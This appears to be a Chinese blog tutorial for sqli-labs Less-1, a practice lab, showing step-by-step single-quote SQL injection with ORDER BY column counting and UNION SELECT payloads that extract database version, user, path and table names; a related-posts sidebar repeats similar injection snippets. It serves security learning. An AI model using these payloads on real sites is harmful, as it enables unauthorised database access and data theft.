sqli2 第一关

已于 2022-07-06 14:45:45 修改
阅读量110 收藏
点赞数
文章标签: sql 数据库
于 2022-07-05 09:07:15 首次发布
原文链接:https://blog.csdn.net/he_and/article/details/79979616
版权

根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果:这里写图片描述

可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己构造的sql语句实施攻击。我们按照步骤来,一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。例如:
select 字段1,字段2 from tab1 union select 字段a,字段b from tab2
在这条sql语句中union前面的sql语句中的字段数应该与union后面的sql语句字段数一致,而且字段1与字段a类型相同,字段2与字段b类型相同(这里不过多阐述了)。
所以现在我们需要做的是
**A.**确定现有sql语句到底查询了多少个字段以及各字段的类型
**B.**构造利用代码
确定字段数一般可以使用order by 语句:
http://localhost/sqlilabs/Less-1/?id=1' order by 1 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 2 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 3 %23
执行成功
http://localhost/sqlilabs/Less-1/?id=1' order by 4 %23
报错:这里写图片描述意思就是没有第四个字段,也就可以推断原本的sql语句只是有用到了三个字段。
因为sql语句的执行结果只有第一行会被回显在页面上,所以我们要把原始语句的的结果集变为空,这样我们想要的结果才能显示在界面上,现在我们又需要确定哪几个字段会被显示在页面上:
http://localhost/sqlilabs/Less-1/?id=1' union select 1,2,3 %23这里写图片描述可以看到字段2,3被显示在了页面上。下面就可以构造语句了(列出几个常用的):

注:我的数据库是mysql
mysql中的注释常用两种方式–+与#,#在url中需要编码为%2以避免与url本身的锚点冲突。

获取数据库版本,数据库路径,当前用户,当前数据库:
http://localhost/sqlilabs/Less-1/?id=1' union select 1,concat_ws('_',user(),version(),database()),@@basedir
利用元数据库来爆表、爆数据
http://localhost/sqlilabs/Less-1/?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

m0_69349614
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli2 第17关
m0_69349614的博客
07-09 355
我们先按照这个网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码。 切换到 Less 11 验证一下,可以看到此时 admin 用户的密码已经被我们所修改。 接下来判断注入类型,使用单引号闭合构造恒真条件,网页回显密码修改失败。 Copy Highlighter-hljs 测试一下所有的注入,发现这些注入网页都回显改密失败。 Copy Highlighter-hljs 抓包得知网页需要利用 POST 方法提交的参数格式如下: Copy Highlighter-hljs
sqli2 2到4关
m0_69349614的博客
07-06 182
报错注入测试注入点:/Less-2/?id=1' (只要能让sql报错就行)发现有LIMIT 0,1,即说明只有一个输出,下面判断要把id项设置为0或不存在,避免占用输出
sqli-labs第2关
weixin_45626840的博客
04-23 210
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
sql整数型注入-sqli第2关
weixin_46784800的博客
11-04 217
第二关注入语法 http://sqli/less-1/?id=0 union select 111,222,database() -- - 爆当前使用的数据库名 http://sqli/less-1/?id=0 union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- - 爆数据库的表名 http://sqli/less-1/?id=
sqli-lab 学习记录less2
qq_43677324的博客
03-16 254
sqli-lab 学习记录less2 less2 1.我们先来判断这次的sql注入类型 我们输入 ?id=1 ?id=1' 发现第一个语句返回正确 但是第二个却有了报错 我们因此可以判断 这次的sql注入类型为数字类型 2. 之后和less1一样 我们进行暴表的名字(暴表) 我们输入 ?id=0 union select 1,group_concat(table_name),3 from inf...
sqli labs 2
yy2013
10-11 220
sqli labs 2 的一些答案解析题11: 查看页面首先这是一道post注入题目的练习 username=admin’ password=1 报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
sqli-labs闯关小游戏21-65.docx
10-23
sqli-labs是一个专门用于学习和练习SQL注入技巧的平台,其关卡设计由易到难,帮助用户深入理解这种攻击方式。 在第21关中,我们可以看到利用了`UNION SELECT`语法,这是SQL注入的经典手法,通过将恶意SQL插入到合法...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
SQL注入练习.rar
06-25
这个靶场环境采用闯关模式,由浅入深地涵盖了一系列SQL注入技术,帮助用户逐步理解并掌握这种攻击手段。 在开始之前,我们需要了解一些基础概念。SQL(Structured Query Language)是用于管理和处理关系数据库的...
android sqlite数据库查看工具
09-04
2. SQL编辑:提供了一个SQL编辑器,支持编写和执行复杂的SQL查询,便于数据的检索和操作。 3. 表格视图:将查询结果以清晰的表格形式展示,便于数据分析。 4. 导入/导出:允许用户导入CSV或其他数据库格式的数据,也...
SQLite小小Demo
08-13
2. **Database版本管理**:每个SQLite数据库都有一个版本号,通过`SQLiteOpenHelper`的构造函数传递。当数据库版本改变时,可以通过调高版本号并实现`onUpgrade()`来更新数据库结构。 3. **SQL语句的执行**:`...
sqli_labs闯关2-9
qq_44111753的博客
11-25 94
Less2 基于整数报错的注入 当id=1’时,报错信息为’ LIMIT 0,1,说明 查询条件为where xx=id,id是一个整数 使用union select即可 Less 3 基于单引号加括号 当id=1’,报错信息 ‘1’’) LIMIT 0,1,分析查询语句条件where xx=‘id’) 使用id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=d
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 530
sqli笔记二
gbxiaowang的博客
07-08 156
盲注 布尔盲注 id=1' --+正常显示 id=1' and 1=1 --+ 正常显示 id=1' and 1=2 --+无显示 id=1' annnd 1=1 --+ 无显示,也无报错显示 第八关源代码: if($row) { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; }
sqli2 第11-16关
m0_69349614的博客
07-09 853
  1.首先输入用户名和密码均为admin进行登录,显示登录成功和相关的sql语句以及登录名和密码,如图所示  2.打开Burp Loader进行抓包分析,打开代理,重新登录,进行抓包  3.将uname、passwd和submit进行复制,粘贴到如图所示位置,然后执行  4.执行之后,显示成功。  5.将uname=admin&passwd=admin&submit=Submit修改为uname=admin'&passwd=admin&submit=Submit,再次执行,如图出现语法错误,说明存在注入漏
SQL 2
yiweii的博客
08-26 429
一、DML语言 功能:可以通过SQL语句中的DML语言来实现数据的操作,包括使用 INSERT 实现数据的 插入 DELETE 实现数据的 删除 UPDATE 实现数据的 更新。 插入数据INSERT 完整插入 语法 INSERT INTO 表名 VALUES (值1,值2,值3…值n); 部分插入 语法 INSERT INTO 表名(列名,...
SQLi-LABS-Page-2-(Adv-Injections)less-23-38注入教程
残阳泼茶香的博客
03-17 500
less 23 GET - Error based - strip comments 基于错误的,过滤注释的GET型 在源码中有这么一段话,过滤了#和–,替换成‘ ’,要想绕过注释过滤,那就只能闭合绕过,多行注释符好像不行 $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, ...
Sqli-Labs之less-2
ISNS的博客
02-05 963
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sqli-labs系列——第二关
1匹黑马
04-26 4043
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一关的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
sqlilabs 第一关
最新发布
11-11
根据提供的引用内容,sqlilabs是一个SQL注入漏洞练习平台,第一关是Less-8,它是一个基于错误的注入漏洞。攻击者可以通过构造恶意的SQL语句来获取数据库中的敏感信息。以下是Less-8的解决方案: 1. 在用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值